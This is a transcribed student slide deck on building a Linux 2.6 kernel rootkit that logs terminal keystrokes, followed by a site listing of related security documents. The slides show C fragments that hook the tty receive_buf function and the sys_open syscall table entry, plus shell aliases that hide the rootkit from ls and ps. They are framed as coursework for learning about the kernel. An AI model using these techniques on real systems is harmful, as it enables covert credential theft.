Linux Kernel Rootkit : Virtual Terminal Key Logger
|
|
- Audra Reynolds
- 8 years ago
- Views:
Transcription
1 Linux Kernel Rootkit : Virtual Terminal Key Logger Jeena Kleenankandy Roll No. P140066CS Depatment of Computer Science and Engineering National Institute of Technology Calicut jeena p140066cs@nitc.ac.in April 24, 2015 Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
2 Overview 1 Objective/Motivation 2 Introduction 3 Terminology 4 Linux TTY Devices 5 Kernel data structures 6 Maintaining Stealth 7 Conclusion & Future Work 8 References Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
3 Objective / Motivation To gain insight into internel working of kernel, especially TTY drivers and system calls To understand the vulnerabilities in kernel, by taking the role of attacker To develop a root-kit, Terminal key-logger, that targets Linux 2.6 kernel Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
4 Introduction Linux Kernel Rootkit 1 Attack the tty structure of linux kernel to capture user inputs, both local & remote logins 2 Modify System call table access privelage to hook system calls 3 Print the captured inputs into system log 4 Modify the ps and ls commands to hide the presence of rootkit Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
5 Some terms & Commands... you already know.. Rootkit A collection of tools that allows a hacker to provide a backdoor into a system, collect information on other systems on the network, mask the fact that the system is compromised, and much more. Rootkits are typically used to capture passwords, though they can be used to collect any priveliged information Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
6 Some terms & Commands... you already know.. Loadable Kernel Module LKM is an object file that contains code to extend the running kernel of an operating system. They are dynamically linked to the kernel and is powerful as it. insmod Insert an LKM into the kernel. rmmod Remove an LKM from the kernel. Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
7 Some terms & Commands... you already know.. System Call Hooks Hooks work by modifying function pointers to point to a malicious version of a function, by which the attacker can gain complete control of the execution flow of a particular call. Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
8 Linux TTY Devices Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
9 Kernel data structures struct tty struct An instance of tty struct is created any time a new tty device is opened, and exists until it is last closed # /usr/include/linux/tty.h struct tty_struct { int magic; struct tty_driver driver; struct tty_ldisc ldisc; struct termios *termios, *termios_locked;... } Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
10 Kernel data structures struct tty ldisc The structure is referenced by the ldisc field of tty struct struct tty_ldisc { struct tty_ldisc_ops *ops; struct tty_struct *tty; }; struct tty_ldisc_ops { void (*receive_buf)(struct tty_struct *, const unsigned char *cp, char *fp, int count); receive buf() function is called by the low-level tty driver to send characters received by the hardware to the line discipline for processing. Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
11 Kernel data structures To log inputs on the tty0 int fd = open("/dev/tty0", O_RDONLY, 0); struct file *file = fget(fd); struct tty_struct *tty = file->private_data; old_receive_buf = tty->ldisc->ops->receive_buf; tty->ldisc->ops->receive_buf = new_receive_buf; tty struct and tty queue structures are dynamically allocated only when the tty is open. We have to intercept sys open syscall to dynamically hooking the receive buf() function of each tty or pty when it s invoked. Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
12 Kernel data structures Our malicious new function void new_receive_buf(struct tty_struct *tty, const unsigned ch char *fp, int count) { //log inputs here... /* call the original receive_buf */ (*old_receive_buf)(tty, cp, fp, count); } cp is a pointer to the buffer of input character received by the device. fp is a pointer to a pointer of flag bytes which indicate whether a character was received with a parity error, etc. Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
13 Kernel data structures To intercept open syscall original_sys_open = sys_call_table[ NR_open]; sys_call_table[ NR_open] = new_sys_open; Oops! Symbol table is no longer exported in Kernel 2.6. To solve this : Get the location of the syscall table from boot/system.map file grep sys call table /boot/system.map sys call table = (void*)0xc ; Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
14 Maintaining Stealth To hide the rootkit, create an alias in the.bashrc file : For ls command, alias ls = ls --ignore=klog For ps command, alias ps = ps > /tmp/temp.txt cat /tmp/temp.txt grep -v klog Not a brilliant idea, but enough to fool a naive user Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
15 Conclusion & Future Work 1 demonstrates that anyone with a basic knowledge of Linux and C programing, can create simple rootkits. 2 should have written to seperate file instead of using printk 3 enhance to listen for a signal from the attacker and send the hijacked password over the network 4 could be made to hide itself from lsmod command Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
16 References Ra ul Siles Pel aez(2004) Linux kernel rootkits: protecting the systems Ring - Zero GIAC Unix Security Administrator (GCUX) Subrata Acharya Dr.,Brian Namovicz, Jonathan Wiseman I. (2010). A Hybrid Root-kit for Linux Operating System, Colonial Academic Alliance Research Journal, 1, pp Linux Cross Reference : Free electrons, url: Accessed on 28 March 2015 Writing Linux Kernel Keylogger, Phrack Magazine, Volume 0x0b, Issue 0x3b, Phile 0x0e of 0x12, June 19th, 2002 Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
17 WORD OF CAUTION Don t ever try this on a real OS, VirtualBoxs are cheaper to crash Thank You Jeena Kleenankandy Roll No. P140066CS (NITC) Linux Rootkit April 24, / 17
Rootkit: Analysis, Detection and Protection
Rootkit: Analysis, Detection and Protection Igor Neri Sicurezza Informatica Prof. Bistarelli 1/34 Definition of Rootkit A rootkit is malware which consists of a set of programs designed to hide or obscure
More informationTraditional Rootkits Lrk4 & KNARK
Traditional Rootkits Lrk4 & KNARK Based on a paper by John Levine & Julian Grizzard http://users.ece.gatech.edu/~owen/research/conference%20publications/rookit_southeastcon2003.pdf ECE 4883 Internetwork
More informationOperating System Structure
Operating System Structure Lecture 3 Disclaimer: some slides are adopted from the book authors slides with permission Recap Computer architecture CPU, memory, disk, I/O devices Memory hierarchy Architectural
More informationAnalysis of the Linux Audit System 1
Analysis of the Linux Audit System 1 Authors Bruno Morisson, MSc (Royal Holloway, 2014) Stephen Wolthusen, ISG, Royal Holloway Overview Audit mechanisms on an operating system (OS) record relevant system
More informationLinux LKM Firewall v 0.95 (2/5/2010)
600/650.424 Network Security Linux LKM Firewall 1 1 Overview Linux LKM Firewall v 0.95 (2/5/2010) The learning objective of this project is for you to understand how firewalls work by designing and implementing
More informationVICE Catch the hookers! (Plus new rootkit techniques) Jamie Butler Greg Hoglund
VICE Catch the hookers! (Plus new rootkit techniques) Jamie Butler Greg Hoglund Agenda Introduction to Rootkits Where to Hook VICE detection Direct Kernel Object Manipulation (DKOM) No hooking required!
More informationKernel Intrusion Detection System
Kernel Intrusion Detection System Rodrigo Rubira Branco rodrigo@kernelhacking.com rodrigo@risesecurity.org Monica's Team!! Brazilian famous H.Q. story Amazon Forest Yeah, Brazilian country! Soccer Brazilian
More informationWorms, Trojan Horses and Root Kits
Worms, Trojan Horses and Root Kits Worms A worm is a type of Virus that is capable of spreading and replicating itself autonomously over the internet. Famous Worms Morris Internet worm (1988) Currently:
More informationNEW CRIMINAL POTENTIAL ANDROID ROOTKIT
NEW CRIMINAL POTENTIAL ANDROID ROOTKIT Alexandru Negrila 1 Abstract Android is a software stack for mobile devices that includes an operating system, middleware and key applications and uses a modified
More informationSoft-Timer Driven Transient Kernel Control Flow Attacks and Defense
Soft-Timer Driven Transient Kernel Control Flow Attacks and Defense Jinpeng Wei, Bryan D. Payne, Jonathon Giffin, Calton Pu Georgia Institute of Technology Annual Computer Security Applications Conference
More informationToasterkit - A NetBSD Rootkit. Anthony Martinez Thomas Bowen http://mrtheplague.net/toasterkit/
Toasterkit - A NetBSD Rootkit Anthony Martinez Thomas Bowen http://mrtheplague.net/toasterkit/ Toasterkit - A NetBSD Rootkit 1. Who we are 2. What is NetBSD? Why NetBSD? 3. Rootkits on NetBSD 4. Architectural
More informationAssignment 5: Adding and testing a new system call to Linux kernel
Assignment 5: Adding and testing a new system call to Linux kernel Antonis Papadogiannakis HY345 Operating Systems Course 1 Outline Introduction: system call and Linux kernel Emulators and Virtual Machines
More informationLinux Driver Devices. Why, When, Which, How?
Bertrand Mermet Sylvain Ract Linux Driver Devices. Why, When, Which, How? Since its creation in the early 1990 s Linux has been installed on millions of computers or embedded systems. These systems may
More informationDetecting Kernel-Level Rootkits Through Binary Analysis
Detecting Kernel-Level Rootkits Through Binary Analysis Abstract Rootkits are tool sets used by intruders to modify the perception that users have of a compromised system. In particular, these tools are
More informationUser-level processes (clients) request services from the kernel (server) via special protected procedure calls
Linux System Call What is System Call? User-level processes (clients) request services from the kernel (server) via special protected procedure calls System calls provide: An abstraction layer between
More informationNetworks. Inter-process Communication. Pipes. Inter-process Communication
Networks Mechanism by which two processes exchange information and coordinate activities Inter-process Communication process CS 217 process Network 1 2 Inter-process Communication Sockets o Processes can
More informationAutomating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com
Automating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com A number of devices are running Linux due to its flexibility and open source nature. This has made Linux platform
More informationFor a 64-bit system. I - Presentation Of The Shellcode
#How To Create Your Own Shellcode On Arch Linux? #Author : N3td3v!l #Contact-mail : 4nonymouse@usa.com #Website : Nopotm.ir #Spcial tnx to : C0nn3ct0r And All Honest Hackerz and Security Managers I - Presentation
More informationLinux Firewall Lab. 1 Overview. 2 Lab Tasks. 2.1 Task 1: Firewall Policies. Laboratory for Computer Security Education 1
Laboratory for Computer Security Education 1 Linux Firewall Lab Copyright c 2006-2011 Wenliang Du, Syracuse University. The development of this document is funded by the National Science Foundation s Course,
More informationServer Forensics: Linux
Server Forensics: Linux Part II.A. Techniques and Tools: Computer Forensics CSF: Forensics Cyber-Security Fall 2015 Nuno Santos Summary } Linux forensics } Overview of Linux (Unix) systems } System subversion
More informationREAL TIME OPERATING SYSTEM PROGRAMMING-II: II: Windows CE, OSEK and Real time Linux. Lesson-12: Real Time Linux
REAL TIME OPERATING SYSTEM PROGRAMMING-II: II: Windows CE, OSEK and Real time Linux Lesson-12: Real Time Linux 1 1. Real Time Linux 2 Linux 2.6.x Linux is after Linus Torvalds, father of the Linux operating
More informationLast Class: OS and Computer Architecture. Last Class: OS and Computer Architecture
Last Class: OS and Computer Architecture System bus Network card CPU, memory, I/O devices, network card, system bus Lecture 3, page 1 Last Class: OS and Computer Architecture OS Service Protection Interrupts
More informationVirtual Machine Security
Virtual Machine Security CSE497b - Spring 2007 Introduction Computer and Network Security Professor Jaeger www.cse.psu.edu/~tjaeger/cse497b-s07/ 1 Operating System Quandary Q: What is the primary goal
More informationOperating Systems and Networks
recap Operating Systems and Networks How OS manages multiple tasks Virtual memory Brief Linux demo Lecture 04: Introduction to OS-part 3 Behzad Bordbar 47 48 Contents Dual mode API to wrap system calls
More informationW4118 Operating Systems. Junfeng Yang
W4118 Operating Systems Junfeng Yang Outline Linux overview Interrupt in Linux System call in Linux What is Linux A modern, open-source OS, based on UNIX standards 1991, 0.1 MLOC, single developer Linus
More informationAbstract. 1. Introduction. 2. Threat Model
Beyond Ring-3: Fine Grained Application Sandboxing Ravi Sahita (ravi.sahita@intel.com), Divya Kolar (divya.kolar@intel.com) Communication Technology Lab. Intel Corporation Abstract In the recent years
More informationPuttyRider. With great power comes great responsibility. # Pivoting from Windows to Linux in a penetration test. Adrian Furtunã, PhD adif2k8@gmail.
PuttyRider # Pivoting from Windows to Linux in a penetration test With great power comes great responsibility Adrian Furtunã, PhD adif2k8@gmail.com root@bt:~# Agenda # Idea origin and usage scenario #
More informationVMM-based Approach to Detecting Stealthy Keyloggers. Kenji KONO Keio Univ.
VMM-based Approach to Detecting Stealthy Keyloggers Kenji KONO Keio Univ. Threat of Keyloggers Keyloggers are a real threat to security Malicious software that steals keystrokes A kind of spyware; spreading
More informationSystem Calls and Standard I/O
System Calls and Standard I/O Professor Jennifer Rexford http://www.cs.princeton.edu/~jrex 1 Goals of Today s Class System calls o How a user process contacts the Operating System o For advanced services
More informationUnix/Linux Forensics 1
Unix/Linux Forensics 1 Simple Linux Commands date display the date ls list the files in the current directory more display files one screen at a time cat display the contents of a file wc displays lines,
More informationProject No. 2: Process Scheduling in Linux Submission due: April 28, 2014, 11:59pm
Project No. 2: Process Scheduling in Linux Submission due: April 28, 2014, 11:59pm PURPOSE Getting familiar with the Linux kernel source code. Understanding process scheduling and how different parameters
More informationLab 6: Building Your Own Firewall
CS498 Systems and Networking Lab Spring 2012 Lab 6: Building Your Own Firewall Instructor: Matthew Caesar Due: Firewalls are widely deployed technologies for protecting networks from unauthorized access
More informationLinux Kernel Architecture
Linux Kernel Architecture Amir Hossein Payberah payberah@yahoo.com Contents What is Kernel? Kernel Architecture Overview User Space Kernel Space Kernel Functional Overview File System Process Management
More informationHacking Database for Owning your Data
Hacking Database for Owning your Data 1 Introduction By Abdulaziz Alrasheed & Xiuwei Yi Stealing data is becoming a major threat. In 2012 alone, 500 fortune companies were compromised causing lots of money
More informationCSE331: Introduction to Networks and Security. Lecture 32 Fall 2004
CSE331: Introduction to Networks and Security Lecture 32 Fall 2004 Hackers / Intruders External attacks Typical hacker Exploits carried out remotely Does not have an account on the remote machine Insider
More information590.7 Network Security Lecture 2: Goals and Challenges of Security Engineering. Xiaowei Yang
590.7 Network Security Lecture 2: Goals and Challenges of Security Engineering Xiaowei Yang Roadmap What is security? Examples of secure systems Security properties Challenges What is security? System
More informationAudit Trail Administration
Audit Trail Administration 0890431-030 August 2003 Copyright 2003 by Concurrent Computer Corporation. All rights reserved. This publication or any part thereof is intended for use with Concurrent Computer
More informationThe Value of Physical Memory for Incident Response
The Value of Physical Memory for Incident Response MCSI 3604 Fair Oaks Blvd Suite 250 Sacramento, CA 95864 www.mcsi.mantech.com 2003-2015 ManTech Cyber Solutions International, All Rights Reserved. Physical
More information(General purpose) Program security. What does it mean for a pgm to be secure? Depends whom you ask. Takes a long time to break its security controls.
(General purpose) Program security These ideas apply also to OS and DB. Read Chapter 3. What does it mean for a pgm to be secure? Depends whom you ask. Takes a long time to break its security controls.
More informationMinix Mini Unix (Minix) basically, a UNIX - compatible operating system. Minix is small in size, with microkernel-based design. Minix has been kept
Minix Mini Unix (Minix) basically, a UNIX - compatible operating system. Minix is small in size, with microkernel-based design. Minix has been kept (relatively) small and simple. Minix is small, it is
More informationCosmic Board for phycore AM335x System on Module and Carrier Board. Application Development User Manual
Cosmic Board for phycore AM335x System on Module and Carrier Board Application Development User Manual Product No: PCL-051/POB-002 SOM PCB No: 1397.0 CB PCB No: 1396.1 Edition: October,2013 In this manual
More informationFINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
More informationSubverting the Xen hypervisor
Subverting the Xen hypervisor Rafał Wojtczuk Invisible Things Lab Black Hat USA 2008, August 7th, Las Vegas, NV Xen 0wning Trilogy Part One Known virtulizationbased rootkits Bluepill and Vitriol They install
More informationSMTP-32 Library. Simple Mail Transfer Protocol Dynamic Link Library for Microsoft Windows. Version 5.2
SMTP-32 Library Simple Mail Transfer Protocol Dynamic Link Library for Microsoft Windows Version 5.2 Copyright 1994-2003 by Distinct Corporation All rights reserved Table of Contents 1 Overview... 5 1.1
More informationOperating Systems Project: Device Drivers
Operating Systems Project: Device Drivers Jordi Garcia and Yolanda Becerra 1 Department of Computer Architecture Universitat Politècnica de Catalunya 1. Introduction September 2012 The main aim of this
More informationNetwork Threats and Vulnerabilities. Ed Crowley
Network Threats and Vulnerabilities Ed Crowley Objectives At the end of this unit, you will be able to describe and explain: Network attack terms Major types of attacks including Denial of Service DoS
More informationForensic analysis of a Linux web server
Mathieu Deous Julien Reveret Forensic analysis of a Linux web server 1 Agenda Who are we? Performing forensic analysis on a compromised web server What to search, where, how? Logs but also dynamic analysis
More informationKeystroke Encryption Technology Explained
Keystroke Encryption Technology Explained Updated February 9, 2008 information@bluegemsecurity.com (800) 650-3670 www.bluegemsecurity.com Executive Summary BlueGem Security is introducing keystroke encryption
More informationCisco Networking Academy Program Curriculum Scope & Sequence. Fundamentals of UNIX version 2.0 (July, 2002)
Cisco Networking Academy Program Curriculum Scope & Sequence Fundamentals of UNIX version 2.0 (July, 2002) Course Description: Fundamentals of UNIX teaches you how to use the UNIX operating system and
More informationSecurity: Attack and Defense
Security: Attack and Defense Aaron Hertz Carnegie Mellon University Outline! Breaking into hosts! DOS Attacks! Firewalls and other tools 15-441 Computer Networks Spring 2003 Breaking Into Hosts! Guessing
More informationCS161: Operating Systems
CS161: Operating Systems Matt Welsh mdw@eecs.harvard.edu Lecture 2: OS Structure and System Calls February 6, 2007 1 Lecture Overview Protection Boundaries and Privilege Levels What makes the kernel different
More informationTwitter and Email Notifications of Linux Server Events
NOTIFICARME Twitter and Email Notifications of Linux Server Events Chitresh Kakwani Kapil Ratnani Nirankar Singh Ravi Kumar Kothuri Vamshi Krishna Reddy V chitresh.kakwani@iiitb.net kapil.ratnani@iiitb.net
More informationImplementation and Implications of a Stealth Hard-Drive Backdoor
March 3rd 2014 OSSIR/JSSI 2014 Paper first presented at ACSAC 2013 Awarded Best Student Paper Award Implementation and Implications of a Stealth Hard-Drive Backdoor Jonas Zaddach Davide Balzarotti Aure
More informationThreat Events: Software Attacks (cont.)
ROOTKIT stealthy software with root/administrator privileges aims to modify the operation of the OS in order to facilitate a nonstandard or unauthorized functions unlike virus, rootkit s goal is not to
More informationCOS 217: Introduction to Programming Systems
COS 217: Introduction to Programming Systems 1 Goals for Todayʼs Class Course overview Introductions Course goals Resources Grading Policies Getting started with C C programming language overview 2 1 Introductions
More informationSoftware security. Buffer overflow attacks SQL injections. Lecture 11 EIT060 Computer Security
Software security Buffer overflow attacks SQL injections Lecture 11 EIT060 Computer Security Buffer overflow attacks Buffer overrun is another common term Definition A condition at an interface under which
More informationBypassing firewalls Another hole in the wall ;-) j.reveret@itrust.fr Présentation pour «La nuit du hack» le 13 Juin 2009
Bypassing firewalls Another hole in the wall ;-) j.reveret@itrust.fr Présentation pour «La nuit du hack» le 13 Juin 2009 Agenda 1. SSH, HTTP(S) proxy: old school and advanced 2. Tunnels and covert channels:
More informationHacking. The Edge Pieces. Ken Gottry May2002. 2002 Ken Gottry
Hacking The Edge Pieces Ken Gottry May2002 Objective - Edge Pieces When you start a jigsaw puzzle, you pick out the edge pieces, the ones with the flat sides. You can do this without knowing what the picture
More informationCS 103 Lab Linux and Virtual Machines
1 Introduction In this lab you will login to your Linux VM and write your first C/C++ program, compile it, and then execute it. 2 What you will learn In this lab you will learn the basic commands and navigation
More informationSystem Calls Related to File Manipulation
KING FAHD UNIVERSITY OF PETROLEUM AND MINERALS Information and Computer Science Department ICS 431 Operating Systems Lab # 12 System Calls Related to File Manipulation Objective: In this lab we will be
More informationSecurity Overview of the Integrity Virtual Machines Architecture
Security Overview of the Integrity Virtual Machines Architecture Introduction... 2 Integrity Virtual Machines Architecture... 2 Virtual Machine Host System... 2 Virtual Machine Control... 2 Scheduling
More informationKernel. What is an Operating System? Systems Software and Application Software. The core of an OS is called kernel, which. Module 9: Operating Systems
Module 9: Operating Systems Objective What is an operating system (OS)? OS kernel, and basic functions OS Examples: MS-DOS, MS Windows, Mac OS Unix/Linux Features of modern OS Graphical operating system
More informationGreen Telnet. Making the Client/Server Model Green
Green Telnet Reducing energy consumption is of growing importance. Jeremy and Ken create a "green telnet" that lets clients transition to a low-power, sleep state. By Jeremy Blackburn and Ken Christensen,
More informationProf. Christos Xenakis, Dr. Christoforos Ntantogian Department of Digital Systems University of Piraeus, Greece
Prof. Christos Xenakis, Dr. Christoforos Ntantogian Department of Digital Systems University of Piraeus, Greece University of Piraeus, Greece Department of Digital Systems System Security Laboratory founded
More informationPentesting Mobile Applications
WEB 应 用 安 全 和 数 据 库 安 全 的 领 航 者! 安 恒 信 息 技 术 有 限 公 司 Pentesting Mobile Applications www.dbappsecurity.com.cn Who am I l Frank Fan: CTO of DBAPPSecurity Graduated from California State University as a Computer
More informationNetworking Operating Systems (CO32010)
Networking Operating Systems (CO32010) 2. Processes and scheduling 1. Operating Systems 1.1 NOS definition and units 1.2 Computer 7. Encryption Systems 1.3 Multitasking and Threading 1.4 Exercises 6. Routers
More informationVirtual Servers. Virtual machines. Virtualization. Design of IBM s VM. Virtual machine systems can give everyone the OS (and hardware) that they want.
Virtual machines Virtual machine systems can give everyone the OS (and hardware) that they want. IBM s VM provided an exact copy of the hardware to the user. Virtual Servers Virtual machines are very widespread.
More informationCyber Security In High-Performance Computing Environment Prakashan Korambath Institute for Digital Research and Education, UCLA July 17, 2014
Cyber Security In High-Performance Computing Environment Prakashan Korambath Institute for Digital Research and Education, UCLA July 17, 2014 Introduction: Cyber attack is an unauthorized access to a computer
More informationAttacking Host Intrusion Prevention Systems. Eugene Tsyrklevich eugene@securityarchitects.com
Attacking Host Intrusion Prevention Systems Eugene Tsyrklevich eugene@securityarchitects.com Agenda Introduction to HIPS Buffer Overflow Protection Operating System Protection Conclusions Demonstration
More informationKeylogging Identity The Defense System TM. Whitepaper. Legal Club of America 7771 W. Oakland Park Blvd. #217 Sunrise, Florida 33351 www.legalclub.
Keylogging Identity The Defense System TM Whitepaper Legal Club of America 7771 W. Oakland Park Blvd. #217 Sunrise, Florida 33351 www.legalclub.com Summary Keyloggers are a serious security threat that
More informationOperating Systems Design 16. Networking: Sockets
Operating Systems Design 16. Networking: Sockets Paul Krzyzanowski pxk@cs.rutgers.edu 1 Sockets IP lets us send data between machines TCP & UDP are transport layer protocols Contain port number to identify
More informationDDoS Attacks: The Latest Threat to Availability. Dr. Bill Highleyman Managing Editor Availability Digest
DDoS Attacks: The Latest Threat to Availability Dr. Bill Highleyman Managing Editor Availability Digest The Anatomy of a DDoS Attack Sombers Associates, Inc. 2013 2 What is a Distributed Denial of Service
More informationXen and XenServer Storage Performance
Xen and XenServer Storage Performance Low Latency Virtualisation Challenges Dr Felipe Franciosi XenServer Engineering Performance Team e-mail: felipe.franciosi@citrix.com freenode: felipef #xen-api twitter:
More informationSecurity types to the rescue
Security types to the rescue p. 1 Security types to the rescue David Wagner and Rob Johnson {daw,rtjohnso}@cs.berkeley.edu University of California, Berkeley Security types to the rescue p. 2 Problem statement
More informationµtasker Document FTP Client
Embedding it better... µtasker Document FTP Client utaskerftp_client.doc/1.01 Copyright 2012 M.J.Butcher Consulting Table of Contents 1. Introduction...3 2. FTP Log-In...4 3. FTP Operation Modes...4 4.
More informationUSB 2.0 Flash Drive User Manual
USB 2.0 Flash Drive User Manual 1 INDEX Table of Contents Page 1. IMPORTANT NOTICES...3 2. PRODUCT INTRODUCTION...4 3. PRODUCT FEATURES...5 4. DRIVER INSTALLATION GUIDE...6 4.1 WINDOWS 98 / 98 SE... 6
More informationOperating System Structures
COP 4610: Introduction to Operating Systems (Spring 2015) Operating System Structures Zhi Wang Florida State University Content Operating system services User interface System calls System programs Operating
More informationA Virtual Machine Introspection Based Architecture for Intrusion Detection
A Virtual Machine Introspection Based Architecture for Intrusion Detection Tal Garfinkel Mendel Rosenblum {talg,mendel}@cs.stanford.edu Computer Science Department, Stanford University Abstract Today s
More informationADVANCED MAC OS X ROOTKITS
ADVANCED MAC OS X ROOTKITS DINO A. DAI ZOVI DDZ@THETA44.ORG Abstract. The Mac OS X kernel (xnu) is a hybrid BSD and Mach kernel. While Unix-oriented rootkit techniques are pretty well known, Mach-based
More informationDesign of a secure system. Example: trusted OS. Bell-La Pdula Model. Evaluation: the orange book. Buffer Overflow Attacks
Stware Security Holes and Defenses Design a secure system Follows a ring design. Every object has an associated security attribute. Every subject has a security clearance. Least secure Highest security
More informationExceptions in MIPS. know the exception mechanism in MIPS be able to write a simple exception handler for a MIPS machine
7 Objectives After completing this lab you will: know the exception mechanism in MIPS be able to write a simple exception handler for a MIPS machine Introduction Branches and jumps provide ways to change
More informationArduino Internet Connectivity: Maintenance Manual Julian Ryan Draft No. 7 April 24, 2015
Arduino Internet Connectivity: Maintenance Manual Julian Ryan Draft No. 7 April 24, 2015 CEN 4935 Senior Software Engineering Project Instructor: Dr. Janusz Zalewski Software Engineering Program Florida
More informationApplication-Level Debugging and Profiling: Gaps in the Tool Ecosystem. Dr Rosemary Francis, Ellexus
Application-Level Debugging and Profiling: Gaps in the Tool Ecosystem Dr Rosemary Francis, Ellexus For years instruction-level debuggers and profilers have improved in leaps and bounds. Similarly, system-level
More informationShared Memory Segments and POSIX Semaphores 1
Shared Memory Segments and POSIX Semaphores 1 Alex Delis delis -at+ pitt.edu October 2012 1 Acknowledgements to Prof. T. Stamatopoulos, M. Avidor, Prof. A. Deligiannakis, S. Evangelatos, Dr. V. Kanitkar
More informationRootkit Detection on Virtual Machines through Deep Information Extraction at Hypervisor-level
Rootkit Detection on Virtual Machines through Deep Information Extraction at Hypervisor-level Xiongwei Xie Department of SIS UNC Charlotte Charlotte, NC 28223 Email: xxie2@uncc.edu Weichao Wang Department
More informationCSE543 - Introduction to Computer and Network Security. Module: Operating System Security
CSE543 - Introduction to Computer and Network Security Module: Operating System Security Professor Trent Jaeger 1 OS Security So, you have built an operating system that enables user-space processes to
More informationEECS 354 Network Security. Introduction
EECS 354 Network Security Introduction Why Learn To Hack Understanding how to break into computer systems allows you to better defend them Learn how to think like an attacker Defense then becomes second-nature
More informationRedline Users Guide. Version 1.12
Redline Users Guide Version 1.12 Contents Contents 1 About Redline 5 Timeline 5 Malware Risk Index (MRI) Score 5 Indicators of Compromise (IOCs) 5 Whitelists 5 Installation 6 System Requirements 6 Install
More informationOperating Systems. Notice that, before you can run programs that you write in JavaScript, you need to jump through a few hoops first
Operating Systems Notice that, before you can run programs that you write in JavaScript, you need to jump through a few hoops first JavaScript interpreter Web browser menu / icon / dock??? login??? CPU,
More informationDevice Management Functions
REAL TIME OPERATING SYSTEMS Lesson-6: Device Management Functions 1 1. Device manager functions 2 Device Driver ISRs Number of device driver ISRs in a system, Each device or device function having s a
More informationRed Hat Linux Internals
Red Hat Linux Internals Learn how the Linux kernel functions and start developing modules. Red Hat Linux internals teaches you all the fundamental requirements necessary to understand and start developing
More informationWindows servers. NT networks
Windows servers The NT security model NT networks Networked NT machines can be: Primary Domain controller Centralizes user database/authentication Backup Domain controller Domain member Non-domain member
More informationEmbedded Programming in C/C++: Lesson-1: Programming Elements and Programming in C
Embedded Programming in C/C++: Lesson-1: Programming Elements and Programming in C 1 An essential part of any embedded system design Programming 2 Programming in Assembly or HLL Processor and memory-sensitive
More informationNetwork packet capture in Linux kernelspace
Network packet capture in Linux kernelspace An overview of the network stack in the Linux kernel Beraldo Leal beraldo@ime.usp.br http://www.ime.usp.br/~beraldo/ Institute of Mathematics and Statistics
More informationWhen you listen to the news, you hear about many different forms of computer infection(s). The most common are:
Access to information and entertainment, credit and financial services, products from every corner of the world even to your work is greater than ever. Thanks to the Internet, you can conduct your banking,
More informationCourse Content: Session 1. Ethics & Hacking
Course Content: Session 1 Ethics & Hacking Hacking history : How it all begin Why is security needed? What is ethical hacking? Ethical Hacker Vs Malicious hacker Types of Hackers Building an approach for
More informationProgrammation Systèmes Cours 7 IPC: FIFO
Programmation Systèmes Cours 7 IPC: FIFO Stefano Zacchiroli zack@pps.jussieu.fr Laboratoire PPS, Université Paris Diderot - Paris 7 15 novembre 2011 URL http://upsilon.cc/zack/teaching/1112/progsyst/ Copyright
More informationCHAPTER 17: File Management
CHAPTER 17: File Management The Architecture of Computer Hardware, Systems Software & Networking: An Information Technology Approach 4th Edition, Irv Englander John Wiley and Sons 2010 PowerPoint slides
More informationIntrusion Detection and Threat Vectors Michael Arent EDS-Global Information Security
Insert photo here Intrusion Detection and Threat Vectors Michael Arent EDS-Global Information Security 1 / 07 May 2008 / EDS The direction is changing.... 2 / 07 May 2008 / EDS Intrusion costs are rising
More informationAn Introduction on How to Better Protect Your Computer and Sensitive Data
An Introduction on How to Better Protect Your Computer and Sensitive Data Common Security Problems Computer users who fail to use strong passwords Constant attacks by viruses, worms, key loggers and bots
More information